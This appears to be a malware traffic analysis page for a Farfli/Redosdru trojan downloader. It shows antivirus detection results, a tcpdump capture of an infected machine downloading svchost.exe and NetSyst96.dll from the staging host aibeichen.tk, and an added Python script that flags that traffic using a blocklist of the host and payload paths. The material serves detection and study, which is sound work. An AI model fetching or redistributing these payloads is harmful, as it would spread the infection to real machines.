Farfli/Beaugrit/Redosdru Malware Trojan Downloader Tropper PCAP file download traffic analysis sample svchost.exe GET /NetSyst96.dll aibeichen.tk

Download Attachments

  • pcap svchost
    Date added: May 15, 2017 2:49 am Added by: admin File size: 101 KB Downloads: 5

SHA256: 0752a3a777360dbbd4ebd344e1f7bf737419d682953762b45508c000db9b1634
File name: svchost.exe
Detection ratio: 50 / 61
Analysis date: 2017-05-15 00:12:16 UTC

Ad-Aware     Trojan.GenericKD.4978088     20170514
AegisLab     Backdoor.W32.Farfli!c     20170514
AhnLab-V3     Backdoor/Win32.Farfli.C1945393     20170514
ALYac     Trojan.GenericKD.4978088     20170514
Arcabit     Trojan.Generic.D4BF5A8     20170514
Avast     Win32:Trojan-gen     20170514
AVG     Downloader.Generic14.AKBZ     20170514
Avira (no cloud)     TR/AD.Itagomoko.cducf     20170514
AVware     LooksLike.Win32.Uruasy.b!ag (v)     20170515
Baidu     Win32.Trojan-Downloader.Agent.jm     20170503
BitDefender     Trojan.GenericKD.4978088     20170514
CAT-QuickHeal     Trojan.Redosdru.19849     20170513
Comodo     Backdoor.Win32.Beaugrit.C     20170515
CrowdStrike Falcon (ML)     malicious_confidence_100% (W)     20170130
Cyren     W32/Trojan.IM.gen!Eldorado     20170515
DrWeb     Trojan.DownLoader18.59296     20170515

2017-05-14 20:57:38.128163 IP 192.168.1.102.57868 > 139.199.219.111.80: Flags [P.], seq 0:397, ack 1, win 261, length 397: HTTP: GET /svchost.exe HTTP/1.1
E...|.@...S....f...o...P....X...P.......GET /svchost.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: aibeichen.tk
Connection: Keep-Alive

2017-05-14 20:57:45.525575 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [.], ack 143520933, win 261, length 0
E..(|.@...Um...f...o...P...F....P...S ........
2017-05-14 20:57:45.536193 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [P.], seq 0:114, ack 1, win 261, length 114: HTTP: GET /NetSyst96.dll HTTP/1.1
E...|.@...T....f...o...P...F....P....W..GET /NetSyst96.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: aibeichen.tk
Cache-Control: no-cache

2017-05-14 20:57:45.942733 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [.], ack 1703, win 261, length 0
E..(|.@...Uk...f...o...P.......KP...L.........
2017-05-14 20:57:45.948787 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [F.], seq 114, ack 1739, win 261, length 0
E..(| @...Uj...f...o...P.......oP...K.........
2017-05-14 20:57:46.079148 IP 192.168.1.102.53853 > 75.75.76.76.53: 10968+ A? aibeichen.tk. (30)
E..:PH.........fKKLL.].5.&..*...........        aibeichen.tk.....
2017-05-14 20:57:46.322193 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [R.], seq 115, ack 3163, win 0, length 0
E..(|!@...Ui...f...o...P........P...GT........
2017-05-14 20:57:46.966656 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [S], seq 879413223, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4|"@...U\...f...o...P4j........ .G...............
2017-05-14 20:57:49.967974 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [S], seq 879413223, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4|#@...U[...f...o...P4j........ .G...............
2017-05-14 20:57:55.967891 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [S], seq 879413223, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0|$@...U^...f...o...P4j......p. .[).........
2017-05-14 20:57:56.345498 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [.], ack 2845472442, win 65504, length 0
E..(|%@...Ue...f...o...P4j....v.P.............
2017-05-14 20:57:56.346395 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [P.], seq 0:149, ack 1, win 65504, length 149: HTTP: GET /NetSyst96.dll HTTP/1.1
E...|&@...T....f...o...P4j....v.P....u..GET /NetSyst96.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: aibeichen.tk
Cache-Control: no-cache
Cookie: HFS_SID=0.475456924876198

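The following Python script is an added example, not part of the original page and not code from the malware author or from any tool used to produce the capture. It parses tcpdump -A style text like the capture above, extracts each HTTP request with its headers, and flags the indicators visible in this traffic: the aibeichen.tk host, the /svchost.exe and /NetSyst96.dll payload paths, the bare "Mozilla/4.0 (compatible)" User-Agent with no Accept header used for the second-stage fetch, and executables retrieved over cleartext HTTP. The sample input is a constructed condensation of the capture above; the indicator sets and the heuristic names are this example's own assumptions, not a published signature.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: a condensation of the capture on this page (one
# ASCII dump line is kept to show that raw header bytes are ignored).
SAMPLE = """\
2017-05-14 20:57:38.128163 IP 192.168.1.102.57868 > 139.199.219.111.80: Flags [P.], seq 0:397, ack 1, win 261, length 397: HTTP: GET /svchost.exe HTTP/1.1
E...|.@...S....f...o...P....X...P.......GET /svchost.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: aibeichen.tk
Connection: Keep-Alive

2017-05-14 20:57:45.525575 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [.], ack 143520933, win 261, length 0
2017-05-14 20:57:45.536193 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [P.], seq 0:114, ack 1, win 261, length 114: HTTP: GET /NetSyst96.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: aibeichen.tk
Cache-Control: no-cache

2017-05-14 20:57:56.346395 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [P.], seq 0:149, ack 1, win 65504, length 149: HTTP: GET /NetSyst96.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: aibeichen.tk
Cache-Control: no-cache
Cookie: HFS_SID=0.475456924876198
"""

SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): (?P<rest>.*)$")
HTTP_RE = re.compile(r"HTTP: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+$")
HEADER_RE = re.compile(r"^(?P<name>[A-Za-z][A-Za-z0-9-]*): (?P<value>.*)$")

# Indicators copied from the capture on this page (assumed blocklist for the example).
KNOWN_BAD_HOSTS = {"aibeichen.tk"}
KNOWN_BAD_PATHS = {"/svchost.exe", "/NetSyst96.dll"}


@dataclass
class HttpRequest:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    method: str
    path: str
    headers: dict = field(default_factory=dict)  # lower-cased header names


def parse_tcpdump(text):
    """Return the HTTP requests in tcpdump -A output. A summary line ending in
    'HTTP: GET /path HTTP/1.1' opens a request, following 'Name: value' lines
    are its headers, and a blank line or the next summary line closes it."""
    requests, current = [], None
    for line in text.splitlines():
        summary = SUMMARY_RE.match(line)
        if summary:
            current = None
            http = HTTP_RE.search(summary.group("rest"))
            if http:
                current = HttpRequest(
                    summary.group("ts"), summary.group("src"), int(summary.group("sport")),
                    summary.group("dst"), int(summary.group("dport")),
                    http.group("method"), http.group("path"))
                requests.append(current)
        elif not line.strip():
            current = None
        elif current is not None:
            header = HEADER_RE.match(line)  # ASCII dump lines never match this
            if header:
                current.headers[header.group("name").lower()] = header.group("value")
    return requests


def assess(req):
    """Return the reasons a request resembles this downloader's traffic (empty if none)."""
    reasons = []
    host = req.headers.get("host", "")
    ua = req.headers.get("user-agent", "")
    if host in KNOWN_BAD_HOSTS:
        reasons.append(f"Host {host} is a known staging domain")
    if req.path in KNOWN_BAD_PATHS:
        reasons.append(f"path {req.path} is a known payload name")
    # Second-stage fetch: bare UA and no Accept header; a browser sends far more.
    if ua == "Mozilla/4.0 (compatible)" and "accept" not in req.headers:
        reasons.append("bare 'Mozilla/4.0 (compatible)' UA without Accept header")
    if req.dport == 80 and req.path.lower().endswith((".exe", ".dll")):
        reasons.append("executable fetched over cleartext HTTP")
    return reasons


def user_agents_by_flow(requests):
    """Map (src, dst) to the set of User-Agents seen; two different UAs from one
    host to one server within seconds is itself a useful hunting signal."""
    flows = {}
    for r in requests:
        flows.setdefault((r.src, r.dst), set()).add(r.headers.get("user-agent", ""))
    return flows


if __name__ == "__main__":
    reqs = parse_tcpdump(SAMPLE)
    for r in reqs:
        print(f"{r.ts} {r.src}:{r.sport} -> {r.dst}:{r.dport} {r.method} {r.path}")
        for reason in assess(r):
            print("    !", reason)
    for (src, dst), uas in user_agents_by_flow(reqs).items():
        print(f"{src} -> {dst}: {len(uas)} distinct User-Agent(s)")
```

Feed it the output of `tcpdump -A -r <file>` (stdin or a file read into `parse_tcpdump`) to get one line per request plus the reasons it matched; the User-Agent-per-flow summary is the part worth keeping even when the hosts and paths in the blocklist change, since the pattern of a browser-like download followed seconds later by a bare-UA fetch of a DLL from the same server is what characterises this traffic.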